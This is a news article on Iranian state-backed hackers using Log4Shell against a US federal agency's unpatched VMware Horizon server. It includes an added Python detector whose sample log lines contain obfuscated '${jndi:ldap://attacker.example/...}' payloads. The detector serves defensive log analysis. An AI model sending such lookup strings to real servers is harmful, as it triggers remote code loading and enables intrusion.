Iranian Hacker Group Uses Log4Shell to Cryptojack US Agency

Hackers Exploited an Unpatched VMware Horizon Server to Gain Access
Hackers sponsored by the Iranian government broke into an unnamed U.S. federal agency's network, stole passwords and implanted cryptocurrency mining software, cybersecurity officials disclosed Wednesday.
The Iranian group - an official security alert doesn't supply its name - exploited a vulnerability that was the subject of a governmentwide emergency patching directive issued last December: CVE-2021-44228, better known as Log4Shell. In this case, the hackers found an unpatched VMware Horizon server.
Federal authorities have warned that the vulnerability in the open-source Java utility Log4j is a favorite of nation-state hackers. The utility, maintained by The Apache Software Foundation, is often deployed as a software library in other applications, including other Apache applications and VMware products. The Cyber Safety Review Board, a federally run committee, earlier this year characterized Log4Shell as an "endemic vulnerability" likely to cause problems for up to a decade and possibly even longer (see: Log4j Flaw Is 'Endemic,' Says Cyber Safety Review Board).
The state-backed hackers installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials and implanted Ngrok reverse proxies on several hosts to maintain persistence, the Cybersecurity and Infrastructure Security Agency and the FBI said in the government alert. The attack likely began in February. CISA says it detected the intrusion in April and worked with the agency in June and July to eradicate the hackers.
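The entry point described in the alert is a Log4Shell lookup string reaching a vulnerable server. As an added example that is not part of this article or of the CISA/FBI alert, the Python below shows how a defender can normalize the nested-lookup tricks commonly used to hide the `${jndi:...}` string in HTTP access logs and flag the attempt; the log lines and the `attacker.example` host are constructed.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the CISA alert or any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Feb/2022:10:01:09 +0000] "GET /portal/?q=${${lower:j}ndi:${lower:r}mi://attacker.example/b} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.9 - - [12/Feb/2022:10:01:12 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://attacker.example/c}"',
]

# Innermost ${...} lookup, i.e. one with no further braces inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# The normalized form we are hunting for: ${jndi:<protocol>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:")


def _resolve(m: "re.Match[str]") -> str:
    """Reduce one innermost Log4j lookup to the text it would expand to."""
    name, _, rest = m.group(1).partition(":")
    name = name.strip().lower()
    if name == "jndi":
        return m.group(0)               # keep the lookup itself for the final match
    if ":-" in rest:
        return rest.rsplit(":-", 1)[1]  # ${env:NOPE:-x} and ${::-x} expand to "x"
    if name in ("lower", "upper"):
        return rest                     # ${lower:J} -> "J"; case is folded below
    return ""                           # any other lookup contributes nothing


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested and obfuscated lookups until the string stops changing."""
    for _ in range(max_rounds):
        reduced = _INNER.sub(_resolve, text)
        if reduced == text:
            break
        text = reduced
    return text.lower()


def find_log4shell_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per log line that carries a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        norm = normalize(line)
        match = _JNDI.search(norm)
        if match:
            hits.append({"line": line, "protocol": match.group(1), "normalized": norm})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOGS):
        print(hit["protocol"], "<-", hit["normalized"])
```

A hit on the normalized form is a strong trigger to check the host for follow-on activity the alert describes, such as unexpected miner processes or reverse-proxy tunnels.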
Whether the Iranians were acting wholly on Tehran's behalf, on their own behalf, or both, is uncertain. The Department of Justice in September indicted three Iranian hackers affiliated with the Islamic Revolutionary Guard Corps for ransomware without making a direct connection to state-sponsored attacks. A senior Department of Justice official speaking on condition of anonymity suggested the hackers were engaged in a financially motivated side project.
This incident could well be the same, said John Hultquist, head of intelligence analysis at cyberthreat intelligence firm Mandiant. "Iran and their peers depend on contractors to carry out cyberespionage and attack activities. Many of these contractors moonlight as criminals and it can be difficult to distinguish this activity from the work done at the behest of the state," he said.
Log4j is one of the most popular Java logging packages, downloaded by more than 51 million users since December 2021, and 38% of those downloads are still vulnerable, according to one industry estimate.
To prevent attacks on vulnerable systems, CISA and the FBI recommend that organizations update VMware Horizon and Unified Access Gateway systems to the latest versions. The vulnerable versions are detailed in VMware's security advisory and knowledge base.